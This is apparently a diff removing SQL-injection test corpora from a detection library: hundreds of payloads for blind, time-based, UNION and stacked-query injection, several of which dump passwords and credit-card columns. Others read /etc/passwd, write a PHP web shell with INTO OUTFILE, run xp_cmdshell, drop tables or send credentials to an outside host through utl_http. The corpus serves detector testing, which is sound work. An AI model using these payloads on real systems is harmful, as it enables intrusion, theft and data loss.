# INSERT INTO FOO VALUES (1, 'foo'), (2, 'bar) ....
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
# $sql = "INSERT INTO FOO VALUES ('$DIRTY', 2)"
F%2A%2A%2A%2A%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
# numeric version
999%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
# arg switch
F%2A%2A%2A%2A%27%2C+2%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
# arg switch + numeric
999%2C+%27CRAP%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
999%2C+1%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A


@ -1,8 +0,0 @@
# http://isc.sans.edu/diary.html?storyid=12127
189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version------snip----
189%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--------snip----
189%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29%29------snip----
189%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29------snip----
# http://isc.sans.edu/diary.html?storyid=11011
999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536--


@ -1,7 +0,0 @@
#
# Yong Deng reported 2016-10-20
#
# Tests that "left" is treated as a function
#
# http://www.w3resource.com/mysql/string-functions/mysql-left-function.php
1'and left(database(),2)>'sa'--+


@ -1,640 +0,0 @@
#
# Misc collected attacks from the wild and beyond....
#
SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
PHPX+AND+1%3D1+AND+XX%3DX
PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27
SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
materials'%20and%201=1%20and%20''='
materials'%20and%201=2%20and%20''='
1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
-999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x
# not sql
#5000224%27%20UNION%20user_id%3E0--
-5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0//
# not sql
#-5000224%27%20UNION%20user_id%3E0--
5000224%27%20or%201=1--
8+and+1=1--
8+order+by+1--
8-999.9+union+select+0
9-999.9+union+select+0--
6334588%00%27%7C%7CSLEEP%283%29%26%26%271
6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29
6334588%26%26SLEEP%283%29
6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271
6334588%27%20AND%20SLEEP%283%29%20AND%20%271
6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35
6444930%20%61%6E%64%20%36%3D%36
6444930%27%20%61%6E%64%20%27%36%27%3D%27%35
6444930%27%20%61%6E%64%20%27%36%27%3D%27%36
FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045
1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29
1234.5%29+ORDER+BY+1
FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29
FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596
FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29
FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29
FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29
FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29
FOO%29+AND+4499%3D8923%23
FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29
FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571
FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350
%28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29
%28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29
FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29
%28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29
FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B--
FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410
FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114
FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285
FOO+WAITFOR+DELAY+%270%3A0%3A5%27--
1+order+by+1
FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29
%28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL--
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27--
-999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29--
CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL--
1 - ORD('A')
TRUE DIV(SELECT ORD(LEFT
TRUE DIV(SELECT (ORD(LEFT
TRUE DIV(SELECT ((ORD(LEFT
1 DIV(SELECT ORD(LEFT
1 DIV(SELECT (ORD(LEFT
0 UNION SELECT (1),2,3
1 AND (SELECT TOP 10 USERNAME FROM USERS);
1 AND SELECT 1 FROM T.TRANS_DATE -- 1
1 AND (SELECT 1 FROM T.TRANS_DATE -- 1
1 GROUP BY 1 HAVING 1 = 1
1 GROUP BY 1 HAVING '1' = 1
1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1
1 AND SELECT TOP 10 USERNAME FROM USERS -- 1
1001 union(select userid, ccnumber, '3', '4' from credit_cards)
1001 union((select userid, ccnumber, '3', '4' from credit_cards))
1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards
1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards
'6334588?'||SLEEP(3)&&'1
1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards)
1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/
(1001)union select-1,ccnumber,3,4 from credit_cards
(1001)union select (1),ccnumber,3,4 from credit_cards
(1001)union select @a,ccnumber,3,4 from credit_cards
1001-\N%0aunion select 1,ccnumber,3,4 from credit_cards
1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards
1001-'text' union select 1,ccnumber,3,4 from credit_cards
1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards
((1001)-1) union select 1,2,3,4 from credit_cards
1001'-@a union select 1,2,3,4 from credit_cards-- -
'1001'-@a union select 1,2,3,4 from credit_cards
((1001)-1) union select 1,2,3,4 from credit_cards
1001 rlike(-1)union select 1,2,3,4 from credit_cards
## 1001 ----1 union select 1,2,3,4 from credit_cards
1001 or 'foo' union select 1,2,3,4 from credit_cards
1001 and @a union select 1,2,3,4 from credit_cards
1001 like @a-1 union select 1,2,3,4 from credit_cards
1001-\N-\N union select 1,2,3,4 from credit_cards
(1001-\N-\N) union select 1,2,3,4 from credit_cards
(1001-\N)-\N union select 1,2,3,4 from credit_cards
1001-\N union select 1,2,3,4 from credit_cards
1001-true union select 1,2,3,4 from credit_cards
(1001-true) union select 1,2,3,4 from credit_cards
(1001-'1') union select 1,2,3,4 from credit_cards
(1001-@version) union select 1,2,3,4 from credit_cards
1-(1001-true) union select 1,2,3,4 from credit_cards
1001-false-false union select 1,2,3,4 from credit_cards
1001-false-NULL union select 1,2,3,4 from credit_cards
1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards
1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards
(1)-'1' union select 1,2,3,4 from credit_cards
(1)-@version union select 1,2,3,4 from credit_cards
(@version)-@version union select 1,2,3,4 from credit_cards
(@version)-1 union select 1,2,3,4 from credit_cards
(@version)-'1' union select 1,2,3,4 from credit_cards
@version-@version union select 1,2,3,4 from credit_cards
@version-1 union select 1,2,3,4 from credit_cards
@version-'1' union select 1,2,3,4 from credit_cards
('1')-'1' union select 1,2,3,4 from credit_cards
1001 rlike(-1-1)union select 1,2,3,4 from credit_cards
1001 rlike(1-1)union select 1,2,3,4 from credit_cards
1001 rlike(@version)union select 1,2,3,4 from credit_cards
1001 rlike(@version-1)union select 1,2,3,4 from credit_cards
1001 rlike(1-@version)union select 1,2,3,4 from credit_cards
1001 rlike('1')union select 1,2,3,4 from credit_cards
# vv new variations 2013-04-10 nickg vv
1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS
# http://vagosec.org/2013/04/mysql-implicit-type-conversion/
# a'+'b encoded is a%27%2B%27b
a%27%2B%27b
' OR 1='1
# new variations
X' != 'Y' = 0 = '1
X' = 'X' = 0 = '1
X' = 'X' = 'X' = 0 = '1
X' - 'Y' - 0 = '1
# part of parameter pollution
1) FROM USERS WHERE USERNAME=
# nest pgsql mssql comments
1/* /*/ */ */ or 1=1-
1/* /* / */ */ or 1=1-
# small sqli
1--
1 --
1 --
1/*
1 /*
1 /*
1*1--
1 * 1--
1 * 1 --
1*1/*
1 * 1/*
1 * 1 /*
1 * 1 /*
@version--
@@version--
@version --
@version /*
@version/*
# thanks @d0znpp
(select id from users limit 1,1)
(select id-0 from users limit 1,1)
# known bypass.. for now!
(select id,id,id,id from users limit 1,1)
# some variations
'1' union (select id from users limit 1,1)
1 union (select id from users limit 1,1)
xxx union (select id from users limit 1,1)
@version union (select id from users limit 1,1)
'1' union (select 1 from users limit 1,1)
1 union (select 1 from users limit 1,1)
xxx union (select 1 from users limit 1,1)
@version union (select 1 from users limit 1,1)
'1' union (select xxx from users limit 1,1)
1 union (select xxx from users limit 1,1)
xxx union (select xxx from users limit 1,1)
@version union (select xxx from users limit 1,1)
'1' union (select 's' from users limit 1,1)
1 union (select 's' from users limit 1,1)
xxx union (select 's' from users limit 1,1)
@version union (select 's' from users limit 1,1)
# thanks @LightOS
-1 union(((select table_name from information_schema.tables limit 1,1)))
'1' union(((select table_name from information_schema.tables limit 1,1)))
@foo union(((select table_name from information_schema.tables limit 1,1)))
id union(((select table_name from information_schema.tables limit 1,1)))
# and again @LightOS
test'-1/1/**/union(select table)
test'-1 union(select table)
test'-@version union (select table)
test'-'xyz' union (select table)
1- @version union(select table_name from information_schema.tables limit 1,1)
1- 'xxx' union(select table_name from information_schema.tables limit 1,1)
1- union(select table_name from information_schema.tables limit 1,1)
@version - @version union(select table_name from information_schema.tables limit 1,1)
@version- 'xxx' union(select table_name from information_schema.tables limit 1,1)
@version - 5 union(select table_name from information_schema.tables limit 1,1)
#
1 into outfile 'asd'
1 into outfile 'asd'--
'1' into outfile 'asd'
'1' into outfile 'asd' --
@version into outfile 'asd'
@version into outfile 'asd' --
1 into outfile ('asd')
'1' into outfile ('asd')
@version into outfile ('asd')
1 into outfile substring('asd', 10, 1)
'1' into outfile substring('asd', 10, 1)
@version into outfile substring('asd', 10 1)
1 into outfile (substring('asd', 10, 1))
'1' into outfile (substring('asd', 10, 1))
@version into outfile (substring('asd', 10 1))
%28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29
union%20%28select+id+from+users+limit+1%2C1%29
#
# This is not valid SQL but designed to force a syntax error
# http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere()
1%0Aand+current_user=notthere()
1%0Aand+current_user=1
1%0Aand+current_user=@version
1%0Aand+current_user='junk'
1%0Aand+current_user=foo
1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
@version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
-.1a%20union%20%28select+id+from+users+limit+1%2C1%29
case 1 when 2 then 2 end
case sin(1) when 2 then 2 end
case '1' when 2 then 2 end
case 1 when 's' then 2 end
case when 2 then 3 end
case when 's' then 3 end
case when f(1) then 3 end
-1 union select table_name asda from information_schema.tables
-1 union select table_name "asda" from information_schema.tables
-1 union select table_name `asda` from information_schema.tables
-1 union select table_name as asda from information_schema.tables
-1 union select table_name as "asda" from information_schema.tables
-1 union select table_name as `asda` from information_schema.tables
a'and(select(binary(/*!system_user()*/)))like'reading%25
-1 union select @``"", table_name from information_schema.tables
'foo' union select @``"", table_name from information_schema.tables
@version union select @``"", table_name from information_schema.tables
select @version foo
select @version "foo"
select @version foo -- junk
select @version "foo" -- junk
$$pgsql evade$$ union select * from foo
$foo$pgsql evade$foo$ union select * from foo
u&'pgsql evade' union select * from foo
U&'pgsql evade' union select * from foo
U&'pgsql evade' uescape '!' union select * from foo
_latin1'foo' union select * from foo
_LATIN7'foo' union select * from foo
_utf8'foo' union select * from foo
REAL 1 union select * from foo
1::REAL union select * from foo
1::REAL::REAL union select * from foo
-1 union select @``"", table_name from information_schema.tables
!~1 union select table_name from information_schema.tables
-1 union select @a`from 1`, table_name from information_schema.tables
version() union select table_name from information_schema.tables
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
1 is unknown union select table_name from information_schema.tables
true is not unknown for update union select table_name from information_schema.tables
1 for update union select 1
# ht/ TK
(true)-(true)union select table_name from information_schema.tables
(@a)-(@a)union select table_name from information_schema.tables
# ht/ @stamparm
1 OR (1 OR 1)--
(1) OR (1 OR 1)--
((1) OR (1 OR 1))--
((1) OR ((1 OR 1)))--
1 OR ((1 OR 1)) --
1 OR ((1) OR 1) --
# ht/ @stamparm
(@x OR @y) UNION ALL SELECT name,email,password FROM users--
(@x OR (@y)) UNION ALL SELECT name,email,password FROM users--
((@x) OR @y) UNION ALL SELECT name,email,password FROM users--
(@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
@x OR (@y) UNION ALL SELECT name,email,password FROM users--
# ht/ @stamparm
(SELECT 1 FROM DUAL)
(SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3--
(SELECT (1) FROM DUAL)
(select @version from dual)
(select (@version - 1) from dual)
(select ('foo' - 1) from dual)
(select 'foo' from dual)
(select 1 foobar from dual)
# previously had problems with operators made from two words
# ht/@stamparm
1 and 1 not between 0 and 1
1 AND 1 SOUNDS LIKE 1
1 AND 1 NOT LIKE 0
(1 AND 1) OR 2>1--
# ht/@FluxReiners
'-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- -
'-(-1 or -1) and 1=0 union
'-(-(1) or -1) and 1=0 union
'-((1) or -1) and 1=0 union
# https://twitter.com/dsrbr/status/342132003270959104
-1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users;
-1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users;
-1 union select null, stragg(login || ':' || pass ||', ') from users;
-1 union select listagg(login || ':' || pass,', ') within group (order by login) from users;
#ht ivan
users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd
# http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html
1'=sleep(1)='1
# https://twitter.com/dsrbr/status/343017094926962691
1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null;
# https://twitter.com/dsrbr/status/341228356936814592
-1 union select top 1 null, lead(pass, 0) over (order by pass) from users;
# https://twitter.com/dsrbr/status/340018970054766592
-1 union select null, array_to_json(array_agg(users))::text from users limit 1;
1 and (select array_to_json(array_agg(users))::text::bool from users limit 1;
# http://www.exploit-db.com/exploits/25915/
' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php'
# http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
# misc secondary sql statements
1 and true; BEGIN DECLARE @xy varchar(8000)
1; BEGIN DECLARE @xy varchar(8000)
x' and 1 = 0; BEGIN DECLARE
x' AND 1=0; DROP TABLE TMP_DB;
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE
# https://twitter.com/st1ll_di3/status/344416764949561346
# http://pastebin.com/Ymcs7nE0
(--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- -
# example from http://www.websec.ca/kb/sql_injection
1=1 AND-+-+-+-+~~((1))
# the bizarre sp_password hackery
1-- foo sp_password
1'--sp_password
# nice ms-access, courtesy mod-security
foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a
# mysql and pgsql string litterals
b'1' UNION SELECT 1
x'1' UNION SELECT 1
n'1' UNION SELECT 1
# ending clauses
1 having 1 limit 1 union select 1--
1 having (1) limit 1 union select 1--
1 having -(1) limit 1 union select 1--
1 having sin(1) limit 1 union select 1--
1 having 1 limit 2 group by 3 union select 1--
1 group by 2 union select 1 --
sin(1) group by 1 union select 1--
@version group by 1 union select 1--
@version group by (-1) union select 1--
(@version) group by -1 union select 1--
(@version) group by (-1) union select 1--
(@version)) group by (-1) union select 1--
(1)) group by (-1) union select 1--
(@version) group by sin(-1) union select 1--
1 group by sin(1) union select 1--
1 group by 1 - sin(1) union select 1--
1 group by (sin(1)) union select 1--
-1 group by -(-sin(1)) union select 1--
sin(1) group by (-sin(1)) union select 1--
sin(1)-1 group by (-sin(1)) union select 1--
sin(1)-1 group by 1 union select 1--
1 group by ((1)) union select 1--
1 group by (((1))) union select 1--
((1)) group by (1) union select 1--
(1) group by ((1)) union select 1--
(1) group by (1) union select 1--
# more with 'having'
-(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
-(1) is not unknown for update UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) for update UNION select table_name from information_schema.tables limit 1
1 for update UNION select table_name from information_schema.tables limit 1
-(1) for update UNION select table_name from information_schema.tables limit 1
-(true) for update UNION select table_name from information_schema.tables limit 1
-(null) for update UNION select table_name from information_schema.tables limit 1
-(\N) for update UNION select table_name from information_schema.tables limit 1
-(\N) for update having true UNION select table_name from information_schema.tables limit 1
-(\N) for update having 1 UNION select table_name from information_schema.tables limit 1
-(1) for update having 1 UNION select table_name from information_schema.tables limit 1
-(1) having 1 for updateUNION select table_name from information_schema.tables limit 1
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
\''; DROP TABLE users; --
\''); DROP TABLE users; --
\''; /* one */ ;DROP TABLE users; --
\''; select 1; drop table users; --
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ;
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
EXEC sp_add_job @job_name = 'TestJob';
EXECUTE sp_add_job @job_name = 'TestJob';
1;EXECUTE sp_add_job @job_name = 'TestJob';
1;print 'foo'; exec xp_cmdshell 'destroy';
# nested sub-selects
-1 - (select (1 - select (select 1))) union all select 2 --
-1 - (select 1) - union all select 2 --
(select 1) - 1 union all select 2 --
((select 1) - 1) + (select 1) union all select 2 --
(select (select (select 1))) union all select 2 --
(select (select (select 1))) union all select 2 --
(select ((select (select 1))) union all select 2 --
(select (select ((select 1))) union all select 2 --
(select ((select 1 - (select 1))) union all select 2 --
(select (select (((select 1))) union all select 2 --
(select ((select (select 1))) union all select 2 --
(select (((select (select 1))) union all select 2 --
(select (select (1 - select 1))) union all select 2 --
(select (select 1 - (select 1))) union all select 2 --
(select 1 - (select 1 - (select 1))) union all select 2 --
# moar unions
-1 union distinct select table_name from information_schema.tables
-1 union distinct all select table_name from information_schema.tables
-1 union all distinct select table_name from information_schema.tables
-1 union all select table_name from information_schema.tables
# more
if(1, -1, 2) union select table_name from information_schema.tables limit 1
if((1), -1, 2) union select table_name from information_schema.tables limit 1
if(1=2, -1, 2) union select table_name from information_schema.tables limit 1
true in(2, (select 2)) union select table_name from information_schema.tables limit 1
true in(2, 1) union select table_name from information_schema.tables limit 1
#
-1 union select current_user``union select table_name from information_schema.tables
if(1, 1, 2) union select 3
if(sin(1), 1, 2) union select 3
